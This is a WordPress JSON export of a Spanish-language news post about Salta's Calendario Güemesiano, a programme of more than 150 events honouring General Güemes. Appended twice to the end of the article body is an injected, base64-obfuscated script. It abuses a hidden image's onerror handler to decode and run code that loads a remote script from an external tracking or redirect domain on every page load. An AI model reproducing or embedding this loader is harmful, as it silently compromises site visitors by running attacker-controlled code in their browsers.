{"id":5221,"date":"2025-06-03T12:26:14","date_gmt":"2025-06-03T15:26:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5221"},"modified":"2025-08-13T23:31:21","modified_gmt":"2025-08-14T02:31:21","slug":"mas-de-150-actividades-en-homenaje-al-general-martin-miguel-de-guemes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5221","title":{"rendered":"M\u00e1s de 150 actividades en homenaje al General Mart\u00edn Miguel de G\u00fcemes"},"content":{"rendered":"\n<p><strong><em>El Ministerio de Turismo y Deportes present\u00f3 el Calendario G\u00fcemesiano, una serie de actos que se llevar\u00e1n a cabo en toda la provincia, en homenaje al h\u00e9roe gaucho.<\/em><\/strong><\/p>\n\n\n\n<p>En un acto realizado en la Escuela Mart\u00edn Miguel de G\u00fcemes, lugar hist\u00f3rico donde vivi\u00f3 su madre y pas\u00f3 su juventud, se present\u00f3 oficialmente el Calendario G\u00fcemesiano organizado por el Ministerio de Turismo y Deportes de la Provincia.<\/p>\n\n\n\n<p>Se presentaron m\u00e1s de 150 actividades que se llevar\u00e1n a cabo en distintas regiones de la provincia, en conmemoraci\u00f3n del aniversario n\u00famero 204 del paso a la Inmortalidad del General Mart\u00edn Miguel de G\u00fcemes.<\/p>\n\n\n\n<p>La presentaci\u00f3n cont\u00f3 con la participaci\u00f3n de&nbsp;<strong>Nadia Loza<\/strong>, secretaria de Turismo, quien destac\u00f3 la importancia de rendir homenaje al h\u00e9roe salte\u00f1o a trav\u00e9s de una amplia variedad de actividades que abarcan desde Guardias bajo las Estrellas, misas en su honor, actos patrios, proyecciones de pel\u00edculas, presentaciones de libros, hasta desfiles gauchos, festivales y ferias. Estas actividades se desarrollar\u00e1n en distintos puntos de Salta, invitando tanto a locales como a turistas a participar de esta celebraci\u00f3n hist\u00f3rica.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17688-presentacion-del-calendario-guemesiano.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17688-presentacion-del-calendario-guemesiano.webp\" alt=\"Presentaci\u00f3n del Calendario G\u00fcemesiano.\"\/><\/a><\/figure>\n\n\n\n<p>Nadia Loza expres\u00f3: \u00abEste calendario es una muestra del compromiso y la dedicaci\u00f3n de todos los salte\u00f1os para conmemorar a un h\u00e9roe que es parte fundamental de nuestra identidad. Las actividades que hemos organizado son una invitaci\u00f3n a todos los salte\u00f1os y visitantes a sentirnos orgullosos de nuestra historia y nuestras tradiciones.\u00bb<\/p>\n\n\n\n<p>En el evento tambi\u00e9n se present\u00f3 la Campa\u00f1a \u00abEste Invierno, abr\u00edgate con nuestro poncho salte\u00f1o\u00bb, que invita a todos los trabajadores del sector tur\u00edstico, como hoteleros, gastron\u00f3micos, informantes tur\u00edsticos, gu\u00edas, choferes y personal de atenci\u00f3n al visitante, a utilizar el poncho como un s\u00edmbolo de homenaje al General G\u00fcemes. Esta campa\u00f1a busca extender el uso del poncho en cada rinc\u00f3n de la provincia durante las festividades, como un reconocimiento tangible a la figura de G\u00fcemes y su legado.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17689-presentacion-del-calendario-guemesiano.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17689-presentacion-del-calendario-guemesiano.webp\" alt=\"Presentaci\u00f3n del Calendario G\u00fcemesiano.\" style=\"width:425px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Participaron del&nbsp;lanzamiento, Fernando Garc\u00eda Bes, Presidente de la Agrupaci\u00f3n Tradicionalista de Salta Gauchos de G\u00fcemes; Carolina I\u00f1igo, Directora de la Escuela Primaria N\u00b04007 \u00abMart\u00edn Miguel de G\u00fcemes\u00bb; Sandra Oyarzun, Supervisora del Ministerio de Educaci\u00f3n; Facundo Assaf, Presidente de la C\u00e1mara de Turismo de Salta; Jorge Gianella, Presidente de la Comisi\u00f3n Guardia Bajo las Estrellas; Virgina Pastrana, Directora Civil del Museo de los Infernales del 5to de Caballer\u00eda; Gladys Ibarra, Presidenta del Fort\u00edn Martina Silva de Gurruchaga; Marta de la Zerda, Asociaci\u00f3n Hero\u00ednas Hispanoamericanas; Natalia Mart\u00edn, Directora del Museo G\u00fcemes; Lidia Reinoso, Escuadr\u00f3n Mar\u00eda Loreto S\u00e1nchez Pe\u00f3n; Noem\u00ed Ram\u00edrez, Secretaria del Fort\u00edn Los Yacones (La Caldera); Mario Lazarovich, Director del Museo Hist\u00f3rico del Norte; Fernando Garc\u00eda Soria, Coordinador del Ente de Turismo de la Ciudad de Salta; y Juan Lucero, Subsecretario de Desarrollo y Competitividad Tur\u00edstica del Ministerio de Turismo y Deportes, entre otros representantes de municipios y organizaciones locales.<\/p>\n\n\n\n<p>Este evento marca el inicio de una serie de celebraciones en toda la provincia, cuyo prop\u00f3sito es continuar promoviendo las tradiciones, la historia y la cultura de Salta, como as\u00ed tambi\u00e9n cada uno de los destinos tur\u00edsticos pertenecientes a las siete regiones, a trav\u00e9s de un trabajo conjunto entre municipios, organizaciones locales y el sector tur\u00edstico. Para m\u00e1s informaci\u00f3n sobre las actividades y para consultar el calendario completo, se invita a los interesados a visitar el sitio web https:\/\/calendar.turismosalta.gov.ar\/.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo y Deportes present\u00f3 el Calendario G\u00fcemesiano, una serie de actos que se llevar\u00e1n a cabo en toda la provincia, en homenaje al h\u00e9roe gaucho. En un acto realizado en la Escuela Mart\u00edn Miguel de G\u00fcemes, lugar hist\u00f3rico donde vivi\u00f3 su madre y pas\u00f3 su juventud, se present\u00f3 oficialmente el Calendario G\u00fcemesiano [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5222,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-5221","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5221"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5221"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5221\/revisions"}],"predecessor-version":[{"id":6473,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5221\/revisions\/6473"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5222"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}